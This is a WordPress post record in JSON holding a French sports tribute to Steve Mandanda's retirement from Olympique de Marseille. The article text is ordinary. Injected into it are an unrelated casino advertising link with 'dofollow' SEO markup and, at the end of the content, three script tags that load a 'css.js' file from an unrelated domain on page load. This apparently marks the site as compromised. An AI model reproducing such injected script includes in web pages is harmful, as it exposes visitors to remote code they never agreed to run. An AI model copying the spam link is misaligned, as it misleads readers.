{"id":3917,"date":"2025-11-20T03:48:02","date_gmt":"2025-11-20T03:48:02","guid":{"rendered":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/?p=3917"},"modified":"2026-02-02T22:12:06","modified_gmt":"2026-02-02T22:12:06","slug":"om-mandanda-annonce-sa-retraite-ultime-hommage","status":"publish","type":"post","link":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/2025\/11\/20\/om-mandanda-annonce-sa-retraite-ultime-hommage\/","title":{"rendered":"OM &#8211; Mandanda annonce sa retraite, ultime hommage"},"content":{"rendered":"<h1>OM &#8211; Mandanda annonce sa retraite, ultime hommage<\/h1>\n<p>Il y a des annonces qui sonnent comme la fin d\u2019une \u00e9poque. Celle de <strong>Steve Mandanda<\/strong>, confiant dans les colonnes de <em>L\u2019\u00c9quipe<\/em> qu\u2019il mettait un terme \u00e0 sa carri\u00e8re \u00e0 40 ans, appartient \u00e0 cette cat\u00e9gorie. Libre depuis le 1er juillet apr\u00e8s la fin de son contrat avec Rennes, l\u2019ancien international tricolore (35 s\u00e9lections) quitte la sc\u00e8ne avec le statut de l\u00e9gende de l\u2019Olympique de Marseille. Plus qu\u2019un gardien, il a incarn\u00e9 une g\u00e9n\u00e9ration, travers\u00e9 les \u00e8res, tenu la barre dans les temp\u00eates comme dans les moments de gloire.\u00a0<\/p>\n<blockquote><p><strong><a href=\"https:\/\/casino-belgium-fr.com\/casino-belgium\/\" target=\"_blank\" rel=\"dofollow\">casino belgium<\/a><\/strong> &#8211; Vous recherchez un casino en ligne de confiance accessible depuis la Belgique ? Vous vous demandez si Casino Belgium propose une exp\u00e9rience de jeu fiable,<\/p><\/blockquote>\n<p>On pourrait croire que son statut se r\u00e9sume \u00e0 sa long\u00e9vit\u00e9 : 14 saisons au club, 613 matchs disput\u00e9s avec l\u2019OM, record absolu. Ce serait d\u00e9j\u00e0 suffisant pour b\u00e2tir une l\u00e9gende. Mais Mandanda, c\u2019est bien plus qu\u2019une fid\u00e9lit\u00e9 exceptionnelle. Il n\u2019a pas \u00e9t\u00e9 seulement un gardien install\u00e9, il a \u00e9t\u00e9 un acteur central de l\u2019histoire moderne de l\u2019OM. Sous Eric Gerets, Didier Deschamps, Marcelo Bielsa, Michel ou Rudi Garcia, il a brill\u00e9 au point d\u2019\u00eatre \u00e9lu avec chacun de ses techniciens meilleur portier de Ligue 1. Sous Andr\u00e9 Villas-Boas, il a m\u00eame d\u00e9croch\u00e9 son deuxi\u00e8me titre de Phoc\u00e9en d\u2019Or en 2020, signe d\u2019une constance et d\u2019une reconnaissance qui d\u00e9passent les simples performances techniques.<\/p>\n<p>Install\u00e9 presque par accident, lors d\u2019une blessure de Carrasso qui lui ouvre la voie, Mandanda ne rendra plus jamais la place. De gardien surdou\u00e9, agile sur sa ligne et rassurant dans ses interventions, il va apprendre \u00e0 \u00e9voluer. Sous Didier Deschamps, il devient capitaine, apprenant \u00e0 diriger, \u00e0 parler, \u00e0 guider. Sous Marcelo Bielsa, il travaille son jeu au pied, devenant plus complet encore. Peu de gardiens ont su autant traverser les \u00e9poques, \u00e9pouser les philosophies d\u2019entra\u00eeneurs aussi diff\u00e9rentes, tout en restant performants.<\/p>\n<p>Bien s\u00fbr, Mandanda n\u2019a pas toujours \u00e9t\u00e9 irr\u00e9prochable. Certaines saisons l\u2019ont vu d\u00e9cliner, parfois trop install\u00e9, parfois en manque de concentration. Marseille, ville exigeante, n\u2019a jamais \u00e9pargn\u00e9 son capitaine. Ren\u00e9 Malleville, dans un coup de gueule rest\u00e9 c\u00e9l\u00e8bre, l\u2019avait m\u00eame tanc\u00e9 dans une punchline pass\u00e9e \u00e0 la post\u00e9rit\u00e9 : &quot;qu&#x27;on arr\u00eate de me dire &quot;tu as tort de critiquer Mandanda&quot;. Je critique qui je veux et tous ceux qui le m\u00e9ritent&quot;. Mais il est revenu derri\u00e8re \u00e0 son meilleur niveau. A chaque fois.<\/p>\n<p>Le dernier exemple reste celui de Jorge Sampaoli. L\u2019Argentin avait d\u00e9cid\u00e9 d\u2019installer Pau Lopez comme num\u00e9ro 1 lors de son passage dans la cit\u00e9 phoc\u00e9enne. Mais quand est venu le moment de s\u00e9curiser une deuxi\u00e8me place qualificative pour la Ligue des champions, Mandanda a repris le r\u00f4le de titulaire. Et comme souvent, il a r\u00e9pondu pr\u00e9sent avec des arr\u00eats d\u00e9cisifs.<\/p>\n<p>A l&#x27;heure o\u00f9 l&#x27;OM s&#x27;appr\u00eate \u00e0 retrouver la Ligue des champions, il faut se souvenir de ses exploits europ\u00e9ens. Parce que si l&#x27;OM a pu y signer des performances au XXIe si\u00e8cle, cela n&#x27;a jamais \u00e9t\u00e9 sans Mandanda. Son match \u00e0 San Siro reste dans toutes les m\u00e9moires : Marseille \u00e9limine l\u2019Inter Milan gr\u00e2ce \u00e0 une performance XXL de son gardien. \u00c0 Anfield, le but splendide de Valbuena n\u2019a pas \u00e9t\u00e9 une simple anecdote parce que Mandanda a multipli\u00e9 les parades pour maintenir le r\u00eave.<\/p>\n<p>Ses 47 matchs de Ligue des champions sous le maillot olympien en font une r\u00e9f\u00e9rence. Il n\u2019est peut-\u00eatre pas au niveau de Fabien Barthez dans le livre de l&#x27;OM, il en convient lui-m\u00eame. Difficile de rivaliser avec l\u2019homme du match le plus important de l\u2019histoire de l\u2019OM. Mais il se place sans doute au-dessus d&#x27;autres monuments comme Carnus ou Olmeta. C&#x27;est dire la place du bonhomme.\u00a0Peu de joueurs, dans l\u2019histoire r\u00e9cente, ont b\u00e9n\u00e9fici\u00e9 d\u2019un tel attachement. Et ce n&#x27;est pas, parce qu&#x27;il \u00e9tait gentil ou qu&#x27;il avait le m\u00e9rite d&#x27;\u00eatre l\u00e0.<\/p>\n<p>\u00c0 40 ans, il aurait pu continuer. Le Havre, Lorient, Guingamp, Brest ou Montpellier l\u2019ont sollicit\u00e9. Mais il a dit non. Parce qu\u2019il sait que la fin doit \u00eatre \u00e0 la hauteur de ce qu\u2019il a construit. Pas question d\u2019une saison de trop, pas question d\u2019effriter une l\u00e9gende. Mandanda s\u2019arr\u00eate au bon moment, lucide, fid\u00e8le \u00e0 son image. Sur ce match au V\u00e9lodrome en mai dernier o\u00f9 il rentre pour le temps additionnel avec un stade entier en d\u00e9lire. Un moment, une \u00e9motion qui vaut bien des troph\u00e9es, bien des contrats. Mandanda l&#x27;a v\u00e9cu et c&#x27;est totalement m\u00e9rit\u00e9.<\/p>\n<p><strong>Romain Canuti<\/strong><\/p>\n<p><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>OM &#8211; Mandanda annonce sa retraite, ultime hommage Il y a des annonces qui sonnent comme la fin d\u2019une \u00e9poque. Celle de Steve Mandanda, confiant dans les colonnes de L\u2019\u00c9quipe&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-3917","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-cassino"},"_links":{"self":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3917","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/comments?post=3917"}],"version-history":[{"count":4,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3917\/revisions"}],"predecessor-version":[{"id":14912,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3917\/revisions\/14912"}],"wp:attachment":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/media?parent=3917"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/categories?post=3917"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/tags?post=3917"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}